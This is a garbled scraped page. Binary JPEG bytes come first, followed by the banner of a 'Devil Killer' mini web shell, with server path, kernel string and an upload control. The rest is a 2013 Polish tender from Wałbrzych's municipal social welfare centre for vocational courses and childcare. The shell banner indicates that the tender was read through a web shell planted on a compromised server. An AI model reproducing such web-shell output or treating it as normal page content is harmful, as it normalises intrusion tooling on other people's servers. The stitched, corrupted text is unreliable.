JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130925/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130925/388390-N-2013.html

<p class="kh_header"><b>Wałbrzych: Zorganizowanie i przeprowadzenie usług o charakterze kursów podnoszących kwalifikacje dla grupy 90 uczestników projektu Od bierności do aktywności - projekt systemowy Miejskiego Ośrodka Pomocy Społecznej w Wałbrzychu wraz ze świadczeniem usług opieki nad 33 dziećmi na czas trwania zajęć w ramach działania pn.: Aktywizacja edukacyjna</b><br>
<b>Numer ogłoszenia: 388390 - 2013; data zamieszczenia: 25.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Beethovena 1-2, 58-300 Wałbrzych, woj. dolnośląskie, tel. 0-74 6640800, faks 0-74 6640800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usług o charakterze kursów podnoszących kwalifikacje dla grupy 90 uczestników projektu Od bierności do aktywności - projekt systemowy Miejskiego Ośrodka Pomocy Społecznej w Wałbrzychu wraz ze świadczeniem usług opieki nad 33 dziećmi na czas trwania zajęć w ramach działania pn.: Aktywizacja edukacyjna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usług o charakterze kursów umożliwiających uzyskanie i uzupełnienie wiedzy, umiejętności i kwalifikacji zawodowych dla grupy 90 uczestników projektu Od bierności do aktywności wraz ze świadczeniem usług opieki nad 33 dziećmi na czas trwania zajęć. Zamawiający informuje, iż wszystkie usługi objęte przedmiotem zamówienia winny zostać przeprowadzone na terenie miasta Wałbrzycha. Podana w specyfikacji liczba osób może ulec zmianie - łącznie w ujęciu całości uczestników kursów o nie więcej niż +/-10 osób.   

W ramach zorganizowania i przeprowadzenia usługi Zamawiający wymaga aby były one przeprowadzone  w następującym zakresie i tematyce:

1) Kurs Obsługa kasy fiskalnej + ABC sprzedaży

1) Liczba osób, które skorzystają z zajęć - 32 osoby,
2) Liczba dzieci objętych opieką - 21 osób (6 m-cy - 3 lata - 18 dzieci, 
3 - 6 lat - 3 dzieci) 
3) Czas trwania kursu Wykonawca przedstawi w programie szkolenia,
z zastrzeżeniem, że liczba godzin lekcyjnych zajęć dziennych nie może być większa niż 8. Zamawiający wymaga aby Wykonawca w ramach prowadzonego szkolenia zapewnił możliwość odbycia zajęć praktycznych dla uczestników szkolenia. Zamawiający przewiduje na to działanie łącznie około 140 godzin zajęć, z czego około 100 godzin zajęć teoretycznych i 40 godzin zajęć praktycznych.
4) Szkolenie winno odbywać się w dwóch grupach 16 osobowych.
5) Minimalny zakres tematyczny kursu założony przez Zamawiającego winien obejmować następującą tematykę:
	a) ogólne zagadnienia marketingu,
	b) zagadnienia z towaroznawstwa,
	c) organizacja handlu,
	d) zagadnienia związane z rolą sprzedawcy w organizacji pracy w sklepie,
	e) etyka kupiecka,
	f) nabycie umiejętności obsługi kasy fiskalnej,
	g) trening umiejętności sprzedaży i obsługi klienta,
	h) psychologia sprzedaży i wiedzy o konsumencie,
	i) nowoczesne formy organizacji i techniki handlu detalicznego,
	j) czynności rachunkowo - kasowe w sklepie. 
6) W ramach prowadzonych zajęć praktycznych związanych z obsługą kas fiskalnych Wykonawca winien zapewnić uczestnikom szkolenia swobodny dostęp do kas fiskalnych z odpowiednim oprogramowaniem. Na jednego uczestnika szkolenia winno przypadać jedno stanowisko pracy.

2) Kurs Pracownik ochrony z zabezpieczeniem mienia sklepowego i budynków

1) Liczba osób które skorzystają z zajęć - 16 osób
2) Liczba dzieci objętych opieką - 2 osoby (6 m-cy - 3 lata - 1 dziecko, 
3 - 6 lat - 1 dziecko) 
3) Czas trwania zajęć Wykonawca przedstawi w programie szkolenia, z zastrzeżeniem, że liczba godzin lekcyjnych zajęć dziennych nie może być większa niż 8. Zamawiający przewiduje na to działanie łącznie około 120 godzin zajęć łącznie, w formie wykładów i ćwiczeń.
4) Szkolenie odbędzie się w jednej grupie obejmującej wszystkich uczestników szkolenia.
5) Minimalny zakres tematyczny kursu założony przez Zamawiającego winien obejmować następującą tematykę:
a) omówienie przepisów prawnych regulujących działalność strażnika mienia 	sklepowego,
b) zadania, obowiązki i uprawnienia strażnika mienia sklepowego i budynków,
c) zasady wykonywania zadań przez strażnika mienia sklepowego i budynków,
d) sposoby i techniki dobrej obserwacji, sposoby reagowania w sytuacjach 	zagrożenia,
e) zasady udzielania pierwszej pomocy,
f) zagadnienia związane z etyką i psychologią zawodu  

3) Kurs Opiekun/ka osób starszych z podstawami języka niemieckiego

1) Liczba osób, które skorzystają z zajęć - 8 osób,
2) Liczba dzieci objętych opieką - 5 osób (6 m-cy - 3 lata - 5 dzieci, 3 - 6 lat - 0 dzieci) 
3) Czas trwania zajęć Wykonawca przedstawi w programie szkolenia,
z zastrzeżeniem, że liczba godzin zajęć dziennie nie może być większa niż 8 godzin lekcyjnych. Zamawiający przewiduje na to działanie łącznie około 150 godzin zajęć łącznie, z czego około 100 godzin zajęć teoretycznych i 50 godzin zajęć praktycznych.
4) Szkolenie odbędzie się w jednej grupie obejmującej wszystkich uczestników szkolenia.
5) Minimalny zakres tematyczny kursu założony przez Zamawiającego winien obejmować następującą tematykę:
a) podstawowe informacje o zdrowiu i chorobach dotyczących osób starszych,
b) sposoby i techniki rehabilitacji osób starszych,
c) podstawy dotyczące pielęgnacji, higieny i żywienia osób chorych i starszych,
d) zagadnienia psychologiczne, pedagogiczne i prawne związane z pełnieniem funkcji opiekuna/opiekunki,
e) pierwsza pomocy medyczna,
f) organizacja czasu wolnego podopiecznego,
g) zagadnienia związane z funkcjonowaniem publicznej służby zdrowia i systemu 	pomocy społecznej,
h) nauka podstaw języka niemieckiego. 

4) Kurs Operator wózka widłowego z polityką magazynową

1) Liczba osób, które skorzystają z zajęć - 13 osób
2) Liczba dzieci objętych opieką - 2 osoby (6 m-cy - 3 lata - 2 dzieci, 3 - 6 lat - 0 dzieci) 
3) Czas trwania zajęć Wykonawca przedstawi w programie szkolenia, z zastrzeżeniem, że liczba godzin zajęć dziennie nie może być większa niż 8 godzin lekcyjnych. Zamawiający przewiduje na to działanie łącznie około 140 godzin zajęć łącznie, z czego około 70 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych.
4) Szkolenie odbędzie się w jednej grupie szkoleniowej.
5) Minimalny zakres tematyczny kursu założony przez Zamawiającego winien obejmować następującą tematykę:
a) zagadnienia związane z przepisami BHP,
b) zasady udzielania pierwszej pomocy,
c) wiadomości o dozorze technicznym,
d) zagadnienia  związane z techniką jazdy wózkiem jezdniowym z napędem 	silnikowym wraz z wymianą i obsługą butli gazowych, 
e) zagadnienia związane z gospodarką magazynową, zastosowanie 	oprogramowania komputerowego w zarządzaniu gospodarką magazynową,
f) praktyczna nauka jazdy i manewrowania wózkiem widłowym (co najmniej 25 	godzin zajęć praktycznych na każdego uczestnika zajęć) 
g) zasady prawidłowego zabezpieczania towarów w magazynach,
h) egzamin UDT.


5) Kurs Pracownik obsługi hotelowej z obsługą maszyn sprzątających i terenów zielonych

1) Liczba osób, które skorzystają z zajęć - 21 osób, 
2) Liczba dzieci objętych opieką - 3 osoby (6 m-cy - 3 lata - 3 dzieci, 
3 - 6 lat - 0 dzieci) 
3) Czas trwania zajęć Wykonawca przedstawi w programie szkolenia,
z zastrzeżeniem, że liczba godzin zajęć dziennie nie może być większa niż 8 godzin lekcyjnych. Zamawiający przewiduje na to działanie łącznie około 80 godzin zajęć łącznie, z czego około 40 godzin zajęć praktycznych i 40 godzin zajęć teoretycznych.
4) Szkolenie odbędzie się w jednej grupie obejmującej wszystkich uczestników szkolenia.
5) Minimalny zakres tematyczny kursu założony przez Zamawiającego winien obejmować następującą tematykę:
a) zakres podstawowych czynności wykonywanych przez pracownika gospodarczego w ramach wykonywanych prac,
b) zagadnienia dotyczące przepisów sanitarnych dotyczących obiektów hotelarskich,
c) zasady utrzymania w prawidłowym stanie sanitarnym i porządkowym obiektu,
d) czynności związane z pielęgnacją terenów zielonych,
e) użytkowanie sprzętu AGD będącego na wyposażeniu obiektu,
f) przepisy BHP i prawa pracy
g) zajęcia praktyczne zawodu.
   
6) Usług opieki nad dziećmi na czas trwania szkoleń

W zakresie świadczenia usług opieki nad dziećmi na czas trwania zajęć uczestników projektu, warunki Zamawiającego odnośnie świadczenia niniejszej usługi kształtują się w następujący sposób:

1) Czas trwania usługi wyniesie - od poniedziałku do piątku - w godzinach
od 8.00 - 16.00 (w szczególnie uzasadnionych przypadkach do godz.17.00). 
2) Sprawowanie usługi opieki nad dziećmi winno odbywać się na terenie miasta Wałbrzycha. Opieka będzie świadczona uprawnionym osobom wyłącznie w dniach 
i godzinach realizacji zajęć,
3) Wykonawcy zostanie powierzona grupa 33 dzieci w wieku od 6 m-cy do 6 lat. Szczegółowa informacja odnośnie szacunkowej liczby dzieci objętych opieką, przypadających na dany kurs została umieszczona w pkt. III ppkt. 1-5.
4) Zamawiający zastrzega, iż podana liczba dzieci może ulec zwiększeniu o nie więcej 5 osób w stosunku do ogólnej przyjętej w SIWZ liczby dzieci.
5) W ramach świadczonej usługi Wykonawca zobowiązuje się do:
a) przejęcia dzieci od matek oraz sprawowania opieki do czasu przekazania dzieci matkom po skończonych zajęciach. Obowiązkowe będzie uzyskanie pisemnej zgody matki na sprawowanie opieki,
b) zapewnienia odpowiednio przygotowanych i wyposażonych pomieszczeń odrębnie dla dzieci młodszych (6 m-cy - 3 lat) i starszych (od 3 do 6 lat), 
w których sprawowana będzie usługa opieki. Warunki świadczenia usługi winny spełniać wszelkie wymagania pod kątem obowiązujących w tym zakresie przepisów prawa, w szczególności odnośnie bezpieczeństwa i higieny pracy 
a także przepisów przeciwpożarowych,
c) zapewnienia odpowiedniej kadry opiekuńczej, zarówno co do liczby jak i kwalifikacji,
d) zapewnienia posiłków dzieciom wraz z napojami i podwieczorkiem, stosownie do ich wieku,
e) wyprowadzania dzieci na spacery, w ramach działań opiekuńczych (najmłodsze dzieci w wózkach dostarczonych przez matki), organizowania gier i zabaw dla dzieci, 
f) ubezpieczenia dzieci od następstw nieszczęśliwych wypadków,
g) ubezpieczenia kadry opiekuńczej od odpowiedzialności cywilnej,
h) zapewnienia transportu dla dzieci w sytuacji kiedy miejsce sprawowania opieki będzie w znaczny sposób oddalone od miejsca realizacji kursów.

W ramach świadczonej usługi Wykonawca zobowiązany będzie do:

1. Zapewnienia uczestnikom kursu codziennej usługi cateringowej podczas trwania kursu w postaci jednego gorącego posiłku i stworzenia warunków umożliwiających jego swobodne spożycie. Oprócz jednego gorącego posiłku, w przerwach pomiędzy zajęciami Wykonawca będzie zobowiązany do przygotowania przerw kawowych i zagwarantowania kawy, herbaty, zimnych napojów oraz słodkiego bufetu.
2) Pokrycia kosztów dojazdu uczestników uczestników kursu do miejsca realizacji kursu i z powrotem do miejsca zamieszkania, bądź zorganizowania bezpłatnego przejazdu w obie strony,
3) Zapewnienia materiałów edukacyjnych zgodnych z profilem i programem danego kursu. 
4) Zagwarantowania odpowiednich pomieszczeń, w których będą odbywały się zajęcia. Winny one spełniać wymagania Kodeksu Pracy, Prawa Budowlanego oraz przepisów odnośnie bezpieczeństwa i higieny pracy a także przepisów przeciwpożarowych. Wykonawca będzie zobowiązany do zapewnienia każdemu uczestnikowi kursu miejsca siedzącego, stolika/ławki bądź krzesła z przystawką, umożliwiającego swobodne sporządzanie notatek. Dodatkowo pomieszczenia,
w których będą odbywały się kursy winny być oznakowane zgodnie
z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z lutego 2009 r.  Strategią Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007-2013 wraz
z załącznikiem Nr 1 oraz Wytycznymi w zakresie informacji i promocji. 
5) Realizacji zajęć od poniedziałku do piątku w przedziale czasowym od 8.00 do 16.00, przy czym zajęcia prowadzone w ramach danego kursu nie mogą  odbywać się krócej niż 6  i dłużej niż 8 godzin dydaktycznych dziennie. 
6) Opracowania i dostarczenia Zamawiającemu co najmniej na trzy dni przed datą rozpoczęcia kursu każdej z grup harmonogramu zajęć, opracowanego w formie tabelarycznej, a także wskazania miejsca realizacji poszczególnych zajęć
w podziale na grupy, oraz przedłożenia listy osób zakwalifikowanych do poszczególnych grup. Dokument ten winien być oznaczony zgodnie z wymogami wynikającymi z Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z lutego 2009 r., Strategią Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007 - 2013 oraz Wytycznych w zakresie informacji i promocji. W nagłówku harmonogramu zajęć winny zostać oznaczone następujące informacje: data planowanych zajęć w ramach prowadzonego kursu, przedział czasowy jaki został zabezpieczony na realizację zagadnień związanych z programem danego kursu, liczba godzin zajęć, tematyka zajęć oraz nazwiska prowadzących zajęcia.
7) W ramach nadzoru wewnętrznego służącego podnoszeniu jakości prowadzonych kursów wyznaczenia (imiennie) opiekuna szkolenia sprawującego nadzór nad jego poprawną realizacją.
8) Zapewnienia wykwalifikowanej kadry trenerów posiadających stosowne uprawnienia,  zdolnych do wykonania przedmiotu zamówienia. 
9) Skierowania i sfinansowania uczestnikom badań lekarskich z zakresu medycyny pracy w przypadkach, kiedy przepisy prawa nakładają taki obowiązek..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Maksymalnie do 50 wartości przedmiotowego postępowania, odnośnie dodatkowych osób skierowanych przez Zamawiającego do odbycia kursów stanowiących przedmiot zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.31.21.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga uiszczenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, wydane zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że w okresie ostatnich 3 lat przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 kursy wchodzące w zakres przedmiotowego zamówienia łącznie dla grupy co najmniej 30 osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia żadnego szczególnego wymagania w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca oświadczy, że dysponuje lub będzie dysponował osobami posiadającymi stosowne kwalifikacje do realizacji przedmiotowego zamówienia w dacie wykonywania zamówienia, w miejscu jego wykonywania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że posiada środki finansowe na rachunku bankowym bądź w spółdzielczej kasie oszczędnościowo - kredytowej lub zdolność kredytową w wysokości co najmniej 10 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
